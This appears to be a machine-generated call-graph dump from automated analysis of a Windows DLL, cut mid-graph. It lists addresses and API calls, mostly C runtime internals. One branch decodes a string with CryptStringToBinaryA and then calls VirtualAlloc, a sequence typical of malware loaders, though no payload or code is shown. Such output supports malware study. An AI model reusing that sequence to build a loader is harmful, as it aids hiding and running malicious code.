7ffc28906b35 17286->17287 17288 7ffc28906b24 17286->17288 17287->17239 17289 7ffc289070b0 __vcrt_uninitialize_ptd 6 API calls 17288->17289 17290 7ffc28906b29 17289->17290 17291 7ffc289079bc __vcrt_uninitialize_locks DeleteCriticalSection 17290->17291 17292 7ffc28906b2e 17291->17292 17751 7ffc28907de4 17292->17751 17295 7ffc2890797c 17294->17295 17297 7ffc289079ad 17295->17297 17299 7ffc28906ad3 17295->17299 17311 7ffc28907d20 17295->17311 17298 7ffc289079bc __vcrt_uninitialize_locks DeleteCriticalSection 17297->17298 17298->17299 17299->17276 17300 7ffc28907070 17299->17300 17326 7ffc28907bbc 17300->17326 17302 7ffc28907080 17303 7ffc28906ae0 17302->17303 17331 7ffc28907cb8 17302->17331 17303->17276 17307 7ffc289079bc 17303->17307 17305 7ffc2890709d 17305->17303 17336 7ffc289070b0 17305->17336 17308 7ffc289079e7 17307->17308 17309 7ffc289079eb 17308->17309 17310 7ffc289079ca DeleteCriticalSection 17308->17310 17309->17276 17310->17308 17316 7ffc289079f4 17311->17316 17314 7ffc28907d77 InitializeCriticalSectionAndSpinCount 17315 7ffc28907d63 17314->17315 17315->17295 17317 7ffc28907a5a 17316->17317 17322 7ffc28907a55 17316->17322 17317->17314 17317->17315 17318 7ffc28907b22 17318->17317 17320 7ffc28907b31 GetProcAddress 17318->17320 17319 7ffc28907a8d LoadLibraryExW 17321 7ffc28907ab3 GetLastError 17319->17321 17319->17322 17320->17317 17323 7ffc28907b49 17320->17323 17321->17322 17324 7ffc28907abe LoadLibraryExW 17321->17324 17322->17317 17322->17318 17322->17319 17325 7ffc28907b00 FreeLibrary 17322->17325 17323->17317 17324->17322 17325->17322 17327 7ffc289079f4 try_get_function 5 API calls 17326->17327 17328 7ffc28907be8 17327->17328 17329 7ffc28907bff TlsAlloc 17328->17329 17330 7ffc28907bf0 17328->17330 17329->17330 17330->17302 17332 7ffc289079f4 try_get_function 5 API calls 17331->17332 17333 7ffc28907ceb 17332->17333 17334 7ffc28907d04 TlsSetValue 17333->17334 17335 7ffc28907cf3 17333->17335 17334->17335 17335->17305 17337 7ffc289070c4 17336->17337 17338 7ffc289070bf 17336->17338 17337->17303 17340 7ffc28907c10 17338->17340 17341 7ffc289079f4 try_get_function 5 API calls 17340->17341 17342 7ffc28907c3b 17341->17342 17343 7ffc28907c51 TlsFree 17342->17343 17344 7ffc28907c43 17342->17344 17343->17344 17344->17337 17346 7ffc2890d29e 17345->17346 17347 7ffc2890d259 17345->17347 17346->17281 17377 7ffc2890b9a8 17347->17377 17352 7ffc2890d1b7 17351->17352 17353 7ffc2890d1c1 17352->17353 17749 7ffc2890bd28 EnterCriticalSection 17352->17749 17356 7ffc2890d233 17353->17356 17358 7ffc2890aa78 __InternalCxxFrameHandler 47 API calls 17353->17358 17356->17281 17360 7ffc2890d24b 17358->17360 17362 7ffc2890d29e 17360->17362 17363 7ffc2890b9a8 52 API calls 17360->17363 17362->17281 17364 7ffc2890d288 17363->17364 17365 7ffc2890cf24 67 API calls 17364->17365 17365->17362 17750 7ffc2890bd28 EnterCriticalSection 17366->17750 17368 7ffc2890dfc0 17369 7ffc2891060c 53 API calls 17368->17369 17370 7ffc2890dfc9 17369->17370 17372 7ffc2890ddb8 55 API calls 17370->17372 17376 7ffc2890dfd7 17370->17376 17371 7ffc2890bd7c Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 17373 7ffc2890dfe3 17371->17373 17374 7ffc2890dfd2 17372->17374 17373->17281 17375 7ffc2890dea8 GetStdHandle GetFileType 17374->17375 17375->17376 17376->17371 17378 7ffc2890b9d4 FlsSetValue 17377->17378 17379 7ffc2890b9b9 FlsGetValue 17377->17379 17380 7ffc2890b9e1 17378->17380 17381 7ffc2890b9c6 17378->17381 17379->17381 17382 7ffc2890b9ce 17379->17382 17420 7ffc2890aad0 17380->17420 17383 7ffc2890b9cc 17381->17383 17438 7ffc2890aa78 17381->17438 17382->17378 17397 7ffc2890cf24 17383->17397 17388 7ffc2890ba0e FlsSetValue 17391 7ffc2890ba2c 17388->17391 17392 7ffc2890ba1a FlsSetValue 17388->17392 17389 7ffc2890b9fe FlsSetValue 17390 7ffc2890ba07 17389->17390 17427 7ffc2890a9dc 17390->17427 17433 7ffc2890b640 17391->17433 17392->17390 17398 7ffc2890d194 67 API calls 17397->17398 17399 7ffc2890cf59 17398->17399 17605 7ffc2890cc24 17399->17605 17402 7ffc2890cf76 17402->17346 17405 7ffc2890cf8f 17406 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17405->17406 17406->17402 17407 7ffc2890cf9e 17407->17407 17619 7ffc2890d2c8 17407->17619 17410 7ffc2890d09a 17411 7ffc2890b420 _set_errno_from_matherr 11 API calls 17410->17411 17412 7ffc2890d09f 17411->17412 17415 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17412->17415 17413 7ffc2890d0f5 17414 7ffc2890d15c 17413->17414 17630 7ffc2890ca54 17413->17630 17418 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17414->17418 17415->17402 17416 7ffc2890d0b4 17416->17413 17419 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17416->17419 17418->17402 17419->17413 17421 7ffc2890aae1 __vcrt_getptd_noexit 17420->17421 17422 7ffc2890ab32 17421->17422 17423 7ffc2890ab16 RtlAllocateHeap 17421->17423 17447 7ffc289097ec 17421->17447 17450 7ffc2890b420 17422->17450 17423->17421 17424 7ffc2890ab30 17423->17424 17424->17388 17424->17389 17428 7ffc2890a9e1 RtlReleasePrivilege 17427->17428 17429 7ffc2890aa10 17427->17429 17428->17429 17430 7ffc2890a9fc GetLastError 17428->17430 17429->17381 17431 7ffc2890aa09 __vcrt_getptd_noexit 17430->17431 17432 7ffc2890b420 _set_errno_from_matherr 9 API calls 17431->17432 17432->17429 17476 7ffc2890b518 17433->17476 17490 7ffc2890e150 17438->17490 17453 7ffc28909828 17447->17453 17459 7ffc2890ba4c GetLastError 17450->17459 17452 7ffc2890b429 17452->17424 17458 7ffc2890bd28 EnterCriticalSection 17453->17458 17455 7ffc28909835 17456 7ffc2890bd7c Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 17455->17456 17457 7ffc289097fa 17456->17457 17457->17421 17460 7ffc2890ba8d FlsSetValue 17459->17460 17465 7ffc2890ba70 17459->17465 17461 7ffc2890ba9f 17460->17461 17464 7ffc2890ba7d 17460->17464 17463 7ffc2890aad0 __vcrt_getptd_noexit 5 API calls 17461->17463 17462 7ffc2890baf9 SetLastError 17462->17452 17466 7ffc2890baae 17463->17466 17464->17462 17465->17460 17465->17464 17467 7ffc2890bacc FlsSetValue 17466->17467 17468 7ffc2890babc FlsSetValue 17466->17468 17470 7ffc2890bad8 FlsSetValue 17467->17470 17471 7ffc2890baea 17467->17471 17469 7ffc2890bac5 17468->17469 17472 7ffc2890a9dc __vcrt_getptd_noexit 5 API calls 17469->17472 17470->17469 17473 7ffc2890b640 _set_errno_from_matherr 5 API calls 17471->17473 17472->17464 17474 7ffc2890baf2 17473->17474 17475 7ffc2890a9dc __vcrt_getptd_noexit 5 API calls 17474->17475 17475->17462 17488 7ffc2890bd28 EnterCriticalSection 17476->17488 17524 7ffc2890e108 17490->17524 17529 7ffc2890bd28 EnterCriticalSection 17524->17529 17645 7ffc2890b2b0 17605->17645 17608 7ffc2890cc44 GetOEMCP 17611 7ffc2890cc6b 17608->17611 17609 7ffc2890cc56 17610 7ffc2890cc5b GetACP 17609->17610 17609->17611 17610->17611 17611->17402 17612 7ffc2890aa18 17611->17612 17613 7ffc2890aa63 17612->17613 17617 7ffc2890aa27 __vcrt_getptd_noexit 17612->17617 17615 7ffc2890b420 _set_errno_from_matherr 11 API calls 17613->17615 17614 7ffc2890aa4a RtlAllocateHeap 17616 7ffc2890aa61 17614->17616 17614->17617 17615->17616 17616->17405 17616->17407 17617->17613 17617->17614 17618 7ffc289097ec new 2 API calls 17617->17618 17618->17617 17620 7ffc2890cc24 49 API calls 17619->17620 17621 7ffc2890d2f5 17620->17621 17623 7ffc2890d332 IsValidCodePage 17621->17623 17627 7ffc2890d375 __scrt_fastfail 17621->17627 17622 7ffc28903a70 _UnwindNestedFrames 8 API calls 17624 7ffc2890d091 17622->17624 17625 7ffc2890d343 17623->17625 17623->17627 17624->17410 17624->17416 17626 7ffc2890d37a GetCPInfo 17625->17626 17629 7ffc2890d34c __scrt_fastfail 17625->17629 17626->17627 17626->17629 17627->17622 17677 7ffc2890cd3c 17629->17677 17748 7ffc2890bd28 EnterCriticalSection 17630->17748 17646 7ffc2890b2d4 17645->17646 17652 7ffc2890b2cf 17645->17652 17647 7ffc2890b8d4 __InternalCxxFrameHandler 47 API calls 17646->17647 17646->17652 17648 7ffc2890b2ef 17647->17648 17653 7ffc2890b440 17648->17653 17652->17608 17652->17609 17654 7ffc2890b455 17653->17654 17655 7ffc2890b312 17653->17655 17654->17655 17661 7ffc2890f224 17654->17661 17657 7ffc2890b4ac 17655->17657 17658 7ffc2890b4c1 17657->17658 17659 7ffc2890b4d4 17657->17659 17658->17659 17674 7ffc2890d2ac 17658->17674 17659->17652 17662 7ffc2890b8d4 __InternalCxxFrameHandler 47 API calls 17661->17662 17663 7ffc2890f233 17662->17663 17664 7ffc2890f27e 17663->17664 17673 7ffc2890bd28 EnterCriticalSection 17663->17673 17664->17655 17675 7ffc2890b8d4 __InternalCxxFrameHandler 47 API calls 17674->17675 17676 7ffc2890d2b5 17675->17676 17678 7ffc2890cd79 GetCPInfo 17677->17678 17679 7ffc2890ce6f 17677->17679 17678->17679 17685 7ffc2890cd8c 17678->17685 17680 7ffc28903a70 _UnwindNestedFrames 8 API calls 17679->17680 17682 7ffc2890cf0e 17680->17682 17682->17627 17688 7ffc2890ed54 17685->17688 17689 7ffc2890b2b0 47 API calls 17688->17689 17690 7ffc2890ed96 17689->17690 17708 7ffc2890d63c 17690->17708 17709 7ffc2890d644 MultiByteToWideChar 17708->17709 17752 7ffc28907e1c 17751->17752 17753 7ffc28907de8 17751->17753 17752->17287 17753->17752 17754 7ffc28907e02 FreeLibrary 17753->17754 17754->17753 17756 7ffc28904022 17755->17756 17759 7ffc28903f7c __scrt_initialize_onexit_tables __scrt_release_startup_lock 17755->17759 17757 7ffc28904944 __scrt_fastfail 7 API calls 17756->17757 17758 7ffc2890402c 17757->17758 17759->17242 17761 7ffc2890414b 17760->17761 17762 7ffc28904141 _onexit 17760->17762 17764 7ffc2890a6bc 17761->17764 17762->17245 17767 7ffc2890a2f8 17764->17767 17774 7ffc2890bd28 EnterCriticalSection 17767->17774 17781 7ffc2890b890 17775->17781 17778 7ffc28906b08 17830 7ffc28906f4c 17778->17830 17782 7ffc2890b8a1 FlsGetValue 17781->17782 17783 7ffc28903e61 17781->17783 17782->17783 17784 7ffc2890b8ae FlsSetValue 17782->17784 17783->17778 17788 7ffc2890b730 17784->17788 17789 7ffc2890b77a 17788->17789 17790 7ffc2890b772 17788->17790 17792 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17789->17792 17791 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17790->17791 17791->17789 17793 7ffc2890b787 17792->17793 17794 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17793->17794 17795 7ffc2890b794 17794->17795 17796 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17795->17796 17797 7ffc2890b7a1 17796->17797 17798 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17797->17798 17799 7ffc2890b7ae 17798->17799 17800 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17799->17800 17801 7ffc2890b7bb 17800->17801 17802 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17801->17802 17803 7ffc2890b7c8 17802->17803 17804 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17803->17804 17805 7ffc2890b7d5 17804->17805 17806 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17805->17806 17807 7ffc2890b7e5 17806->17807 17808 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17807->17808 17809 7ffc2890b7f5 17808->17809 17814 7ffc2890b5e0 17809->17814 17828 7ffc2890bd28 EnterCriticalSection 17814->17828 17831 7ffc28903e66 17830->17831 17832 7ffc28906f60 17830->17832 17831->17172 17833 7ffc28906f6a 17832->17833 17838 7ffc28907c64 17832->17838 17834 7ffc28907cb8 __vcrt_FlsSetValue 6 API calls 17833->17834 17836 7ffc28906f7a 17834->17836 17836->17831 17837 7ffc2890a9dc __vcrt_getptd_noexit 11 API calls 17836->17837 17837->17831 17839 7ffc289079f4 try_get_function 5 API calls 17838->17839 17840 7ffc28907c8f 17839->17840 17841 7ffc28907ca5 TlsGetValue 17840->17841 17842 7ffc28907c97 17840->17842 17841->17842 17842->17833 17850 7ffc2890bd28 EnterCriticalSection 17843->17850 18006 7ffc28901710 17851->18006 17858 7ffc28901540 47 API calls 17859 7ffc289199f7 17858->17859 17860 7ffc28902970 49 API calls 17859->17860 17861 7ffc28919a13 17860->17861 17862 7ffc28901580 49 API calls 17861->17862 17863 7ffc28919a2a 17862->17863 17864 7ffc28901540 47 API calls 17863->17864 17865 7ffc28919a37 17864->17865 17866 7ffc28902970 49 API calls 17865->17866 17867 7ffc28919a53 17866->17867 17868 7ffc28901580 49 API calls 17867->17868 17869 7ffc28919a6a 17868->17869 17870 7ffc28901540 47 API calls 17869->17870 17871 7ffc28919a77 17870->17871 17872 7ffc28902970 49 API calls 17871->17872 17873 7ffc28919a93 17872->17873 17874 7ffc28901580 49 API calls 17873->17874 17875 7ffc28919aaa 17874->17875 17876 7ffc28901540 47 API calls 17875->17876 17877 7ffc28919ab7 17876->17877 17878 7ffc28902970 49 API calls 17877->17878 17879 7ffc28919ad3 17878->17879 17880 7ffc28901580 49 API calls 17879->17880 17881 7ffc28919aea 17880->17881 17882 7ffc28901540 47 API calls 17881->17882 17883 7ffc28919af7 17882->17883 17884 7ffc28902970 49 API calls 17883->17884 17885 7ffc28919b13 17884->17885 17886 7ffc28901580 49 API calls 17885->17886 17887 7ffc28919b2a 17886->17887 17888 7ffc28901540 47 API calls 17887->17888 17889 7ffc28919b37 17888->17889 17890 7ffc28902970 49 API calls 17889->17890 17891 7ffc28919b53 17890->17891 17892 7ffc28901580 49 API calls 17891->17892 17893 7ffc28919b6a 17892->17893 17894 7ffc28901540 47 API calls 17893->17894 17895 7ffc28919b77 17894->17895 17896 7ffc28902970 49 API calls 17895->17896 17897 7ffc28919b93 17896->17897 17898 7ffc28901580 49 API calls 17897->17898 17899 7ffc28919baa 17898->17899 17900 7ffc28901540 47 API calls 17899->17900 17901 7ffc28919bb7 17900->17901 17902 7ffc28902970 49 API calls 17901->17902 17903 7ffc28919bd3 17902->17903 17904 7ffc28901580 49 API calls 17903->17904 17905 7ffc28919bea 17904->17905 17906 7ffc28901540 47 API calls 17905->17906 17907 7ffc28919bf7 17906->17907 17908 7ffc28902970 49 API calls 17907->17908 17909 7ffc28919c13 17908->17909 17910 7ffc28901580 49 API calls 17909->17910 17911 7ffc28919c2a 17910->17911 17912 7ffc28901540 47 API calls 17911->17912 17913 7ffc28919c37 17912->17913 17914 7ffc28902970 49 API calls 17913->17914 17915 7ffc28919c53 17914->17915 17916 7ffc28901580 49 API calls 17915->17916 17917 7ffc28919c6a 17916->17917 17918 7ffc28901540 47 API calls 17917->17918 17919 7ffc28919c77 17918->17919 17920 7ffc28902970 49 API calls 17919->17920 17921 7ffc28919c93 17920->17921 17922 7ffc28901580 49 API calls 17921->17922 17923 7ffc28919cb0 17922->17923 17924 7ffc28901540 47 API calls 17923->17924 17925 7ffc28919cbd 17924->17925 17926 7ffc28902970 49 API calls 17925->17926 17927 7ffc28919cd9 17926->17927 17928 7ffc28901580 49 API calls 17927->17928 17929 7ffc28919cf6 17928->17929 17930 7ffc28901540 47 API calls 17929->17930 17931 7ffc28919d03 17930->17931 17932 7ffc28902970 49 API calls 17931->17932 17933 7ffc28919d1f 17932->17933 17934 7ffc28901580 49 API calls 17933->17934 17935 7ffc28919d3c 17934->17935 17936 7ffc28901540 47 API calls 17935->17936 17937 7ffc28919d49 17936->17937 17938 7ffc28902970 49 API calls 17937->17938 17939 7ffc28919d65 17938->17939 17940 7ffc28901580 49 API calls 17939->17940 17941 7ffc28919d82 17940->17941 17942 7ffc28901540 47 API calls 17941->17942 17943 7ffc28919d8f 17942->17943 17944 7ffc28902970 49 API calls 17943->17944 17945 7ffc28919dab 17944->17945 17946 7ffc28901580 49 API calls 17945->17946 17947 7ffc28919dc8 17946->17947 17948 7ffc28901540 47 API calls 17947->17948 17949 7ffc28919dd5 17948->17949 17950 7ffc28902970 49 API calls 17949->17950 17951 7ffc28919df1 17950->17951 17952 7ffc28901580 49 API calls 17951->17952 17953 7ffc28919e0e 17952->17953 17954 7ffc28901540 47 API calls 17953->17954 17955 7ffc28919e1b 17954->17955 17956 7ffc28902970 49 API calls 17955->17956 17957 7ffc28919e37 17956->17957 17958 7ffc28901580 49 API calls 17957->17958 17959 7ffc28919e54 17958->17959 17960 7ffc28901540 47 API calls 17959->17960 17961 7ffc28919e61 17960->17961 17962 7ffc28902970 49 API calls 17961->17962 17963 7ffc28919e7d 17962->17963 17964 7ffc28901580 49 API calls 17963->17964 17965 7ffc28919e9a 17964->17965 17966 7ffc28901540 47 API calls 17965->17966 17967 7ffc28919ea7 17966->17967 18036 7ffc289016a0 17967->18036 17970 7ffc28901540 47 API calls 17971 7ffc28919ed4 17970->17971 17972 7ffc28903a70 _UnwindNestedFrames 8 API calls 17971->17972 17973 7ffc28919eec 17972->17973 17973->17204 17975 7ffc28919437 CryptStringToBinaryA 17974->17975 17978 7ffc28919239 17974->17978 17976 7ffc28919476 __std_exception_copy 17975->17976 17975->17978 17977 7ffc289194b9 CryptStringToBinaryA 17976->17977 17976->17978 17977->17978 17979 7ffc28901540 17978->17979 17980 7ffc28901910 type_info::_name_internal_method 47 API calls 17979->17980 17981 7ffc28901561 Concurrency::details::WorkQueue::IsStructuredEmpty 17980->17981 17981->17210 18239 7ffc289091b8 17982->18239 17985 7ffc289091b8 47 API calls 17986 7ffc2891954e 17985->17986 17987 7ffc289091b8 47 API calls 17986->17987 17988 7ffc2891955e VirtualAlloc 17987->17988 17989 7ffc289193bd 17988->17989 17989->17222 18265 7ffc28919f40 17990->18265 17992 7ffc28919f11 17993 7ffc2891928c CoInitialize 17992->17993 17994 7ffc28919f24 ExitProcess 17992->17994 17993->17217 17993->17218 17995->17223 17997 7ffc28913d53 RegisterTouchWindow 17996->17997 18003 7ffc28913d4c 17996->18003 17998 7ffc28913d64 MessageBoxW 17997->17998 17999 7ffc28913d87 17997->17999 17998->18003 18000 7ffc28913d93 CoCreateInstance 17999->18000 18001 7ffc28913dc6 18000->18001 18000->18003 18289 7ffc28903d6c 18001->18289 18003->17226 18003->17227 18004 7ffc28913dd0 18004->18003 18005 7ffc28913e9b ShowWindow UpdateWindow 18004->18005 18005->18003 18007 7ffc28901731 18006->18007 18042 7ffc28901910 18007->18042 18009 7ffc28901741 18046 7ffc28901b10 18009->18046 18012 7ffc28902970 18167 7ffc28901760 18012->18167 18014 7ffc289029ad char_traits 18171 7ffc28902cc0 18014->18171 18016 7ffc289029e2 18175 7ffc28902e90 18016->18175 18021 7ffc289016a0 47 API calls 18022 7ffc28902a12 18021->18022 18023 7ffc28901540 47 API calls 18022->18023 18024 7ffc28902a27 18023->18024 18025 7ffc28903a70 _UnwindNestedFrames 8 API calls 18024->18025 18026 7ffc28902a39 18025->18026 18027 7ffc28901580 18026->18027 18028 7ffc289015a7 18027->18028 18034 7ffc28901677 18027->18034 18029 7ffc28901910 type_info::_name_internal_method 47 API calls 18028->18029 18030 7ffc289015b6 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::HardwareAffinity::operator!= 18029->18030 18031 7ffc2890167a 18030->18031 18032 7ffc2890163d 18030->18032 18208 7ffc28901f00 18031->18208 18204 7ffc28902a90 18032->18204 18034->17858 18037 7ffc289016c1 Concurrency::details::WorkQueue::IsStructuredEmpty shared_ptr 18036->18037 18038 7ffc28901910 type_info::_name_internal_method 47 API calls 18037->18038 18039 7ffc289016e8 18038->18039 18040 7ffc28901f00 47 API calls 18039->18040 18041 7ffc28901701 18040->18041 18041->17970 18043 7ffc2890192b type_info::_name_internal_method 18042->18043 18044 7ffc28901930 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 18042->18044 18043->18009 18044->18043 18050 7ffc28902100 18044->18050 18047 7ffc28901b28 char_traits 18046->18047 18077 7ffc28901b40 18047->18077 18049 7ffc28901750 18049->18012 18053 7ffc28902880 18050->18053 18056 7ffc289013a0 18053->18056 18055 7ffc28902127 18055->18043 18057 7ffc289013c8 18056->18057 18058 7ffc289013cd 18056->18058 18068 7ffc28909764 18057->18068 18060 7ffc2890146b 18058->18060 18061 7ffc28901409 18058->18061 18062 7ffc28909764 _invalid_parameter_noinfo_noreturn 47 API calls 18058->18062 18060->18055 18063 7ffc28901435 18061->18063 18064 7ffc28909764 _invalid_parameter_noinfo_noreturn 47 API calls 18061->18064 18062->18061 18065 7ffc28901450 18063->18065 18066 7ffc28909764 _invalid_parameter_noinfo_noreturn 47 API calls 18063->18066 18064->18063 18065->18060 18067 7ffc28909764 _invalid_parameter_noinfo_noreturn 47 API calls 18065->18067 18066->18065 18067->18060 18069 7ffc289095d8 _invalid_parameter_noinfo 47 API calls 18068->18069 18070 7ffc2890977d 18069->18070 18073 7ffc28909794 IsProcessorFeaturePresent 18070->18073 18074 7ffc289097a7 18073->18074 18075 7ffc28909474 _invalid_parameter_noinfo_noreturn 14 API calls 18074->18075 18076 7ffc289097c2 GetCurrentProcess TerminateProcess 18075->18076 18078 7ffc28901b62 type_info::_name_internal_method 18077->18078 18079 7ffc28901b69 Concurrency::details::ContextBase::GetWorkQueueIdentity 18078->18079 18080 7ffc28901b97 18078->18080 18093 7ffc28901bf0 18079->18093 18084 7ffc289022b0 18080->18084 18082 7ffc28901b95 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 18082->18049 18085 7ffc289022cd type_info::_name_internal_method 18084->18085 18086 7ffc289022de type_info::_name_internal_method 18085->18086 18109 7ffc28902230 18085->18109 18088 7ffc289022f2 type_info::_name_internal_method 18086->18088 18091 7ffc28902310 type_info::_name_internal_method 18086->18091 18103 7ffc28902600 18088->18103 18090 7ffc2890230e type_info::_name_internal_method 18090->18082 18091->18090 18092 7ffc28901910 type_info::_name_internal_method 47 API calls 18091->18092 18092->18090 18146 7ffc289021f0 18093->18146 18095 7ffc28901c17 type_info::_name_internal_method 18096 7ffc28901c6c 18095->18096 18097 7ffc28901c3c 18095->18097 18099 7ffc289022b0 type_info::_name_internal_method 49 API calls 18096->18099 18150 7ffc28902520 18097->18150 18102 7ffc28901c6a Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 18099->18102 18100 7ffc28901c59 18153 7ffc28902450 18100->18153 18102->18082 18106 7ffc28902640 Concurrency::details::WorkQueue::IsStructuredEmpty type_info::_name_internal_method 18103->18106 18105 7ffc28901910 type_info::_name_internal_method 47 API calls 18108 7ffc289027c2 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method 18105->18108 18112 7ffc289028e0 18106->18112 18107 7ffc28902760 Concurrency::details::ContextBase::GetWorkQueueIdentity char_traits 18107->18105 18108->18090 18129 7ffc28904e9c 18109->18129 18115 7ffc28902930 18112->18115 18118 7ffc289012b0 18115->18118 18119 7ffc289012de 18118->18119 18128 7ffc289012d4 18118->18128 18120 7ffc289012f8 18119->18120 18121 7ffc28904e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 18119->18121 18122 7ffc2890137c 18120->18122 18125 7ffc2890131c 18120->18125 18121->18120 18123 7ffc28903d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 18122->18123 18123->18128 18124 7ffc2890133b 18127 7ffc28903d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 18124->18127 18125->18124 18126 7ffc28904e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 18125->18126 18126->18124 18127->18128 18128->18107 18134 7ffc28904c70 18129->18134 18133 7ffc28904ebe 18142 7ffc28906d48 18134->18142 18136 7ffc28904ca7 18137 7ffc28906e00 18136->18137 18138 7ffc28906e6e RtlPcToFileHeader 18137->18138 18139 7ffc28906e4c 18137->18139 18140 7ffc28906e93 18138->18140 18141 7ffc28906eae RaiseException 18138->18141 18139->18138 18140->18141 18141->18133 18143 7ffc28906d69 __std_exception_copy 18142->18143 18144 7ffc28906d9e __std_exception_copy 18142->18144 18143->18144 18145 7ffc2890a97c __std_exception_copy 47 API calls 18143->18145 18144->18136 18145->18144 18147 7ffc28902208 type_info::_name_internal_method 18146->18147 18148 7ffc2890221c 18147->18148 18156 7ffc289025e0 18147->18156 18148->18095 18151 7ffc289021f0 type_info::_name_internal_method 49 API calls 18150->18151 18152 7ffc2890253d type_info::_name_internal_method 18151->18152 18152->18100 18154 7ffc289021f0 type_info::_name_internal_method 49 API calls 18153->18154 18155 7ffc28902472 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 18154->18155 18155->18102 18159 7ffc28904ec0 18156->18159 18164 7ffc28904d3c 18159->18164 18162 7ffc28906e00 _CxxThrowException 2 API calls 18163 7ffc28904ee2 18162->18163 18165 7ffc28906d48 __std_exception_copy 47 API calls 18164->18165 18166 7ffc28904d73 18165->18166 18166->18162 18168 7ffc2890177c 18167->18168 18169 7ffc28901910 type_info::_name_internal_method 47 API calls 18168->18169 18170 7ffc2890178c 18169->18170 18170->18014 18172 7ffc28902cd8 type_info::_name_internal_method 18171->18172 18173 7ffc289022b0 type_info::_name_internal_method 49 API calls 18172->18173 18174 7ffc28902d1a type_info::_name_internal_method 18172->18174 18173->18174 18174->18016 18181 7ffc28901510 18175->18181 18178 7ffc28902e60 18191 7ffc289014e0 18178->18191 18184 7ffc28901df0 18181->18184 18183 7ffc28901537 18183->18178 18185 7ffc289021f0 type_info::_name_internal_method 49 API calls 18184->18185 18186 7ffc28901e17 type_info::_name_internal_method 18185->18186 18187 7ffc28902230 _Mtx_guard::~_Mtx_guard 49 API calls 18186->18187 18188 7ffc28901e5b type_info::_name_internal_method 18186->18188 18187->18188 18189 7ffc289022b0 type_info::_name_internal_method 49 API calls 18188->18189 18190 7ffc28901e8c Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 18188->18190 18189->18190 18190->18183 18192 7ffc289014f8 char_traits 18191->18192 18195 7ffc28901ce0 18192->18195 18194 7ffc2890150a 18194->18021 18196 7ffc28901d02 type_info::_name_internal_method 18195->18196 18197 7ffc28901d09 Concurrency::details::ContextBase::GetWorkQueueIdentity 18196->18197 18199 7ffc28901d3a type_info::_name_internal_method 18196->18199 18198 7ffc28901df0 type_info::_name_internal_method 49 API calls 18197->18198 18203 7ffc28901d35 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 18198->18203 18200 7ffc28902230 _Mtx_guard::~_Mtx_guard 49 API calls 18199->18200 18201 7ffc28901d65 type_info::_name_internal_method 18199->18201 18200->18201 18202 7ffc289022b0 type_info::_name_internal_method 49 API calls 18201->18202 18201->18203 18202->18203 18203->18194 18205 7ffc28902ab2 18204->18205 18212 7ffc28902d40 18205->18212 18209 7ffc28901f18 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method char_traits 18208->18209 18210 7ffc28901910 type_info::_name_internal_method 47 API calls 18209->18210 18211 7ffc28902016 18210->18211 18211->18034 18213 7ffc28902d6d 18212->18213 18214 7ffc28902dc1 type_info::_name_internal_method 18213->18214 18215 7ffc28902d74 type_info::_name_internal_method 18213->18215 18219 7ffc28902fc0 18214->18219 18216 7ffc28902450 49 API calls 18215->18216 18217 7ffc28902af4 18216->18217 18217->18034 18220 7ffc28902fea type_info::_name_internal_method 18219->18220 18221 7ffc28902ff1 Concurrency::details::ContextBase::GetWorkQueueIdentity 18220->18221 18222 7ffc2890303c 18220->18222 18230 7ffc28903240 18221->18230 18223 7ffc289021f0 type_info::_name_internal_method 49 API calls 18222->18223 18225 7ffc2890304b type_info::_name_internal_method 18223->18225 18226 7ffc28902230 _Mtx_guard::~_Mtx_guard 49 API calls 18225->18226 18227 7ffc289030aa Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 18225->18227 18226->18227 18228 7ffc289022b0 type_info::_name_internal_method 49 API calls 18227->18228 18229 7ffc28903037 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 18227->18229 18228->18229 18229->18217 18231 7ffc289021f0 type_info::_name_internal_method 49 API calls 18230->18231 18232 7ffc28903270 18231->18232 18233 7ffc289021f0 type_info::_name_internal_method 49 API calls 18232->18233 18234 7ffc28903285 type_info::_name_internal_method 18233->18234 18235 7ffc28902230 _Mtx_guard::~_Mtx_guard 49 API calls 18234->18235 18236 7ffc28903315 type_info::_name_internal_method 18234->18236 18235->18236 18237 7ffc289022b0 type_info::_name_internal_method 49 API calls 18236->18237 18238 7ffc2890338e Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 18236->18238 18237->18238 18238->18229 18240 7ffc289091e8 18239->18240 18247 7ffc2890893c 18240->18247 18243 7ffc289090d0 _invalid_parameter_noinfo 47 API calls 18245 7ffc2890923c 18243->18245 18244 7ffc28909251 18244->17985 18245->18244 18246 7ffc289090d0 _invalid_parameter_noinfo 47 API calls 18245->18246 18246->18244 18248 